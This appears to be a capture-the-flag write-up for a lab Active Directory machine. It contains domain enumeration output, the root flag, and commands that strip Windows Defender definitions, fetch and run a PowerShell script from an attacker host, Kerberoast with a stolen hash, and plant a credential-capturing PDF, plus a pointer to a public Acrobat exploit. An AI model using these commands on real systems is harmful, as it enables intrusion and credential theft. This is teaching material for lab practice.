CERT [email protected],S-1-5-21-3087775142-3775047424-3590407223-517 ==> Members of this group are permitted to publish certificates to the directory
SYSTEM MANAGED ACCOUNTS [email protected],CONTEMPT.HTB-S-1-5-32-581 ==> Members of this group are managed by the system.
GROUP POLICY CREATOR [email protected],S-1-5-21-3087775142-3775047424-3590407223-520 ==> Members in this group can modify group policy for the domain
CERTIFICATE SERVICE DCOM [email protected],CONTEMPT.HTB-S-1-5-32-574 ==> Members of this group are allowed to connect to Certification Authorities in the enterprise
DENIED RODC PASSWORD REPLICATION [email protected],S-1-5-21-3087775142-3775047424-3590407223-572 ==> Members in this group cannot have their passwords replicated to any read-only domain controllers in the domain
[email protected],CONTEMPT.HTB-S-1-5-32-568 ==> Built-in group used by Internet Information Services.
[email protected],CONTEMPT.HTB-S-1-5-32-546 ==> Guests have the same access as members of the Users group by default, except for the Guest account which is further restricted
WINDOWS AUTHORIZATION ACCESS [email protected],CONTEMPT.HTB-S-1-5-32-560 ==> Members of this group have access to the computed tokenGroupsGlobalAndUniversal attribute on User objects
[email protected],CONTEMPT.HTB-S-1-5-32-545 ==> Users are prevented from making accidental or intentional system-wide changes and can run most applications
PRE-WINDOWS 2000 COMPATIBLE [email protected],CONTEMPT.HTB-S-1-5-32-554 ==> A backward compatibility group which allows read access on all users and groups in the domain
[!] Protected Groups:
[email protected],CONTEMPT.HTB-S-1-5-32-544
    => DOMAIN [email protected],S-1-5-21-3087775142-3775047424-3590407223-512
    => ENTERPRISE [email protected],S-1-5-21-3087775142-3775047424-3590407223-519
    => [email protected],S-1-5-21-3087775142-3775047424-3590407223-500
SCHEMA [email protected],S-1-5-21-3087775142-3775047424-3590407223-518
    => [email protected],S-1-5-21-3087775142-3775047424-3590407223-500
DOMAIN [email protected],S-1-5-21-3087775142-3775047424-3590407223-512
    => [email protected],S-1-5-21-3087775142-3775047424-3590407223-1609
    => [email protected],S-1-5-21-3087775142-3775047424-3590407223-1608
    => [email protected],S-1-5-21-3087775142-3775047424-3590407223-500
ENTERPRISE [email protected],S-1-5-21-3087775142-3775047424-3590407223-519
    => [email protected],S-1-5-21-3087775142-3775047424-3590407223-500
[!] Custom Groups:
[email protected],S-1-5-21-3087775142-3775047424-3590407223-1114
    => [email protected],S-1-5-21-3087775142-3775047424-3590407223-1606
    => [email protected],S-1-5-21-3087775142-3775047424-3590407223-1605
    => [email protected],S-1-5-21-3087775142-3775047424-3590407223-1604
    => [email protected],S-1-5-21-3087775142-3775047424-3590407223-1603
[*] Default Groups:
CERT [email protected],S-1-5-21-3087775142-3775047424-3590407223-517
    => DC01.CONTEMPT.HTB,S-1-5-21-3087775142-3775047424-3590407223-1000
SYSTEM MANAGED ACCOUNTS [email protected],CONTEMPT.HTB-S-1-5-32-581
    => [email protected],S-1-5-21-3087775142-3775047424-3590407223-503
GROUP POLICY CREATOR [email protected],S-1-5-21-3087775142-3775047424-3590407223-520
    => [email protected],S-1-5-21-3087775142-3775047424-3590407223-500
CERTIFICATE SERVICE DCOM [email protected],CONTEMPT.HTB-S-1-5-32-574
    => AUTHENTICATED [email protected],CONTEMPT.HTB-S-1-5-11
DENIED RODC PASSWORD REPLICATION [email protected],S-1-5-21-3087775142-3775047424-3590407223-572
    => READ-ONLY DOMAIN [email protected],S-1-5-21-3087775142-3775047424-3590407223-521
    => GROUP POLICY CREATOR [email protected],S-1-5-21-3087775142-3775047424-3590407223-520
    => DOMAIN [email protected],S-1-5-21-3087775142-3775047424-3590407223-512
    => CERT [email protected],S-1-5-21-3087775142-3775047424-3590407223-517
    => ENTERPRISE [email protected],S-1-5-21-3087775142-3775047424-3590407223-519
    => SCHEMA [email protected],S-1-5-21-3087775142-3775047424-3590407223-518
    => DOMAIN [email protected],S-1-5-21-3087775142-3775047424-3590407223-516
    => [email protected],S-1-5-21-3087775142-3775047424-3590407223-502
[email protected],CONTEMPT.HTB-S-1-5-32-568
    => THIS ORGANIZATION @CONTEMPT.HTB,CONTEMPT.HTB-S-1-5-17
[email protected],CONTEMPT.HTB-S-1-5-32-546
    => DOMAIN [email protected],S-1-5-21-3087775142-3775047424-3590407223-514
    => [email protected],S-1-5-21-3087775142-3775047424-3590407223-501
WINDOWS AUTHORIZATION ACCESS [email protected],CONTEMPT.HTB-S-1-5-32-560
    => ENTERPRISE DOMAIN [email protected],CONTEMPT.HTB-S-1-5-9
[email protected],CONTEMPT.HTB-S-1-5-32-545
    => DOMAIN [email protected],S-1-5-21-3087775142-3775047424-3590407223-513
    => AUTHENTICATED [email protected],CONTEMPT.HTB-S-1-5-11
    => [email protected],CONTEMPT.HTB-S-1-5-4
PRE-WINDOWS 2000 COMPATIBLE [email protected],CONTEMPT.HTB-S-1-5-32-554
    => DC01.CONTEMPT.HTB,S-1-5-21-3087775142-3775047424-3590407223-1000
    => AUTHENTICATED [email protected],CONTEMPT.HTB-S-1-5-11
ENTERPRISE DOMAIN [email protected],CONTEMPT.HTB-S-1-5-9
    => DC01.CONTEMPT.HTB,S-1-5-21-3087775142-3775047424-3590407223-1000

===================================================
==================== USER DATA ====================
===================================================
[*] Domains:
CONTEMPT.HTB S-1-5-21-3087775142-3775047424-3590407223
[*] Enabled Users:
zero.summers,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1604
orion.swift,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1607
svc-ldap,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1104
matrix.cross,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1606
svc-adfs$,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1103
phoenix.reed,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1602
administrator,[email protected],S-1-5-21-3087775142-3775047424-3590407223-500
seraphina.blake,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1601
cipher.stone,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1603
aria.frost,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1608
echo.rivers,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1609
viper.hollow,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1605
[*] Disabled or Local Users:
krbtgt,[email protected],S-1-5-21-3087775142-3775047424-3590407223-502
guest,[email protected],S-1-5-21-3087775142-3775047424-3590407223-501
defaultaccount,[email protected],S-1-5-21-3087775142-3775047424-3590407223-503
none,NT [email protected],CONTEMPT.HTB-S-1-5-20
[*] Admin Users:
krbtgt,[email protected],S-1-5-21-3087775142-3775047424-3590407223-502
administrator,[email protected],S-1-5-21-3087775142-3775047424-3590407223-500
aria.frost,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1608
echo.rivers,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1609
[*] Password Not Required:
guest,[email protected],S-1-5-21-3087775142-3775047424-3590407223-501
defaultaccount,[email protected],S-1-5-21-3087775142-3775047424-3590407223-503
[*] Users with Default Passwords:
svc-adfs$,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1103
administrator,[email protected],S-1-5-21-3087775142-3775047424-3590407223-500
aria.frost,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1608
[*] Users Logged in:
matrix.cross,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1606 ==> Thu 25 May 2023 12:45:06 EST
viper.hollow,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1605 ==> Thu 25 May 2023 12:45:22 EST
zero.summers,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1604 ==> Thu 25 May 2023 12:46:28 EST
cipher.stone,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1603 ==> Thu 25 May 2023 12:49:12 EST
administrator,[email protected],S-1-5-21-3087775142-3775047424-3590407223-500 ==> Fri 14 Jul 2023 19:52:52 EST
svc-ldap,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1104 ==> Fri 14 Jul 2023 20:03:58 EST
aria.frost,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1608 ==> Sat 15 Jul 2023 08:54:26 EST
svc-adfs$,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1103 ==> Sat 15 Jul 2023 09:40:49 EST
echo.rivers,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1609 ==> Tue 18 Jul 2023 05:20:00 EST
[*] User Creation Times:
guest,[email protected],S-1-5-21-3087775142-3775047424-3590407223-501 ==> Thu 18 May 2023 05:29:06 EST
administrator,[email protected],S-1-5-21-3087775142-3775047424-3590407223-500 ==> Thu 18 May 2023 05:29:06 EST
defaultaccount,[email protected],S-1-5-21-3087775142-3775047424-3590407223-503 ==> Thu 18 May 2023 05:29:06 EST
krbtgt,[email protected],S-1-5-21-3087775142-3775047424-3590407223-502 ==> Thu 18 May 2023 05:29:43 EST
svc-adfs$,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1103 ==> Thu 18 May 2023 05:58:07 EST
svc-ldap,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1104 ==> Thu 18 May 2023 06:33:32 EST
seraphina.blake,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1601 ==> Thu 18 May 2023 07:43:06 EST
phoenix.reed,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1602 ==> Thu 18 May 2023 07:43:37 EST
cipher.stone,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1603 ==> Thu 18 May 2023 07:44:39 EST
zero.summers,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1604 ==> Thu 18 May 2023 07:45:01 EST
viper.hollow,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1605 ==> Thu 18 May 2023 07:45:28 EST
matrix.cross,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1606 ==> Thu 18 May 2023 07:45:56 EST
orion.swift,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1607 ==> Thu 18 May 2023 07:46:33 EST
aria.frost,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1608 ==> Thu 18 May 2023 07:47:11 EST
echo.rivers,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1609 ==> Thu 18 May 2023 07:47:33 EST
[*] Users with Descriptions:
krbtgt,[email protected],S-1-5-21-3087775142-3775047424-3590407223-502 ==> Key Distribution Center Service Account
guest,[email protected],S-1-5-21-3087775142-3775047424-3590407223-501 ==> Built-in account for guest access to the computer/domain
administrator,[email protected],S-1-5-21-3087775142-3775047424-3590407223-500 ==> Built-in account for administering the computer/domain
defaultaccount,[email protected],S-1-5-21-3087775142-3775047424-3590407223-503 ==> A user account managed by the system.
[*] ASREPRoastable Users:
orion.swift,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1607
[*] Kerberoastable Users (ServicePrincipalNames):
krbtgt,[email protected],S-1-5-21-3087775142-3775047424-3590407223-502 ==> kadmin/changepw
svc-adfs$,[email protected],S-1-5-21-3087775142-3775047424-3590407223-1103 ==> host/adfs.contempt.htb
[*] Users dumped to ./users-contempt.htb.txt
[*] Program Complete!

User File Discovery on DC01

Recursively listing user-profile files surfaces the Administrator and aria.frost artifacts — including dns_clean.ps1, adobe.ps1, and link.txt, which point at the intended PDF phishing chain.

PS C:\users> gci -recurse -file -filter '*.*' | select fullname
gci -recurse -file -filter '*.*' | select fullname

FullName
--------
C:\users\Administrator\Desktop\putty.exe
C:\users\Administrator\Desktop\root.txt
C:\users\Administrator\Documents\dns_clean.ps1
C:\users\Administrator\Favorites\Bing.url
C:\users\Administrator\Links\Desktop.lnk
C:\users\Administrator\Links\Downloads.lnk
C:\users\aria.frost\link.txt
C:\users\aria.frost\Desktop\putty.exe
C:\users\aria.frost\Documents\adobe.ps1
C:\users\aria.frost\Favorites\Bing.url
C:\users\aria.frost\Links\Desktop.lnk
C:\users\aria.frost\Links\Downloads.lnk

C:\users>type C:\users\Administrator\Desktop\root.txt
HTB{HeY_iv3_g0n3_phIsHINg_leav3_4_meSs4g3}

The aria.frost\link.txt file lists Windows Update packages (KB references for July 2023, plus older 2021/2022 cumulative updates):

PS C:\users> cat C:\users\aria.frost\link.txt
https://catalog.s.download.windowsupdate.com/d/msdownload/update/software/secu/2023/07/windows10.0-kb5028169-x64_077bf66aff587a4bad99068a77eebd8ee48be55b.msu

https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2021/12/windows10.0-kb5008207-x64_cf6806ca21959c09136350ee37096950189f1023.msu

https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/updt/2022/05/windows10.0-kb5015019-x64_df310a1f53ff14237dbaaea8d9751a577b3d7cc3.msu

The Administrator dns_clean.ps1 script removes the dc01 A record for 172.16.20.1 once the DNS service is running — useful context for the internal routing.

PS C:\users> cat C:\users\Administrator\Documents\dns_clean.ps1
cat C:\users\Administrator\Documents\dns_clean.ps1
$zoneName = "contempt.htb"
$recordName = "dc01"
$recordIPAddress = "172.16.20.1"

$dnsService = Get-Service -Name "DNS"
$maxRetries = 10
$retryInterval = 5  # seconds
$retryCount = 0

# Wait for DNS service to start
while (($dnsService.Status -ne "Running") -and ($retryCount -lt $maxRetries)) {
    Write-Host "Waiting for DNS service to start..."
    Start-Sleep -Seconds $retryInterval
    $dnsService.Refresh()
    $retryCount++
}

if ($dnsService.Status -eq "Running") {
    $zone = Get-DnsServerZone -Name $zoneName

    if ($zone) {
        $record = Get-DnsServerResourceRecord -ZoneName $zone.ZoneName -RRType A -Name $recordName

        if ($record) {
            if ($record.RecordData.IPv4Address.IpAddressToString.Contains($recordIPAddress)) {
                Remove-DnsServerResourceRecord -ZoneName $zone.ZoneName -RRType A -Name $recordName -RecordData $recordIPAddress -Force
                Write-Host "A record deleted successfully."
            } else {
                Write-Host "A record not found in the specified zone."
            }
        } else {
            Write-Host "A record not found in the specified zone."
        }
    } else {
        Write-Host "Zone '$zoneName' not found."
    }
} else {
    Write-Host "DNS service did not start within the specified time."
}

Internal Network Sweep

From the DC we sweep the internal 172.16.20.0/24 subnet and port-scan the Nextcloud VM. A parallel ping sweep finds 172.16.20.20 alive, and an in-memory PowerSploit Invoke-Portscan confirms it exposes 22, 80, 443, and 3306.

workflow ParallelSweep { foreach -parallel -throttlelimit 4 ($i in 1..254) {ping -n 1 -w 100 172.16.20.$i}}; ParallelSweep | Select-String ttl

Reply from 172.16.20.20: bytes=32 time<1ms TTL=64

cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.79/Invoke-Portscan.ps1');
Invoke-Portscan -Hosts 172.16.20.20 -TopPorts 100 -T 5 | Where { $_.Alive -eq "True" } | Select-Object Hostname, openPorts | ForEach-Object { $openPorts = ($_.openPorts | Sort-Object | ForEach-Object { $_.ToString() }) -join ',';Write-Output "$($_.Hostname): $openPorts" }
172.16.20.20: 22,80,443,3306

Kerberoasting svc-adfs$

Using the Administrator hash to request a service ticket for the ADFS service account (the only domain account with a useful SPN besides krbtgt).

impacket-GetUserSPNs -hashes ':8845ad387f66869ab9768c8a7b08b36f' -request-user 'adfs_svc$' -dc-ip contempt.htb 'contempt.htb/administrator'

Appendix: Intended Path — PDF Phishing aria.frost

The intended foothold targets aria.frost, a Domain Admin running a scheduled task that opens any PDF dropped into her reports directory using a vulnerable 32-bit Adobe Acrobat Reader build (2022.003.20258).

Bad-PDF (NTLM Capture Attempt)

A first approach is Bad-PDF, which generates a PDF that coerces an NTLM authentication to a Responder listener when opened. Generate the malicious PDF.

udo python2 /opt/gits/Bad-Pdf/badpdf.py

        ______                 __       _______  ______   ________
        |_   _ \               |  ]     |_   __ \|_   _ `.|_   __  |
          | |_) |  ,--.    .--.| | ______ | |__) | | | `. \ | |_ \_|
          |  __'. `'_\ : / /'`' ||______||  ___/  | |  | | |  _|
         _| |__) |// | |,| \__/  |       _| |_    _| |_.' /_| |_
        |_______/ '-;__/ '.__.;__]     |_____|  |______.'|_____|

        Author : Deepu TV ; Alias DeepZec

        =============================================================

Responder detected :/usr/sbin/responder
Please enter Bad-PDF host IP:
10.10.14.79
Please enter output file name:
bad.pdf
Please enter the interface name to listen(Default eth0):
tun0
[*] Starting Process.. [*]
Bad PDF bad.pdf created

Then drop the PDF into the watched reports directory so the scheduled task opens it.

meterpreter > cd "C:\users\aria.frost\documents\\reports"
meterpreter > upload bad.pdf

Full winpeas output is archived here:

The PDF-Opening Scheduled Task

The aria.frost\Documents\adobe.ps1 script is what makes the phishing work: it disables Adobe’s auto-update, then loops over every PDF in the reports directory, opening each in AcroRd32.exe, waiting, killing the process, and deleting the file.

PS C:\users> cat C:\users\aria.frost\Documents\adobe.ps1
$directory = "C:\users\aria.frost\documents\reports\"

$pdfFiles = Get-ChildItem -Path $directory -Filter *.pdf

if ((Get-Scheduledtask -TaskName "Adobe Acrobat Update Task").State -ne "Disabled") {
    Disable-ScheduledTask -TaskName "Adobe Acrobat Update Task"
    }

if ((Get-Service -ServiceName "Adobe Acrobat Update Service" | select StartType) -ne "Disabled") {
    Set-Service -Name "AdobeARMservice" -StartupType Disabled
    }

foreach ($pdfFile in $pdfFiles) {
    & "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" $directory$pdfFile
    sleep 25
    Stop-Process -id (Get-Process -Name AcroRd32).Id
    sleep 1
    rm -Force $directory$pdfFile
}

The intended kill-chain phishes aria.frost with a PDF that exploits the vulnerable Adobe Acrobat Reader 32-bit build 2022.003.20258. This corresponds to CVE-2023-21608, a use-after-free in Acrobat Reader’s resetForm handling that yields arbitrary code execution in the context of the current user, requiring the victim to open a malicious file. A public exploit is available here:

https://github.com/hacksysteam/CVE-2023-21608/blob/main/exploit.js

Reference material for CVE-2023-21608 (Adobe Acrobat Reader resetForm CAgg UaF RCE):

https://github.com/hacksysteam/CVE-2023-21608/
https://github.com/hacksysteam/CVE-2023-21608/tree/main

Per the advisory, Adobe Acrobat Reader versions 22.003.20282 (and earlier), 22.003.20281 (and earlier), and 20.005.30418 (and earlier) are affected by a use-after-free that could result in arbitrary code execution in the context of the current user; exploitation requires the victim to open a malicious file.

image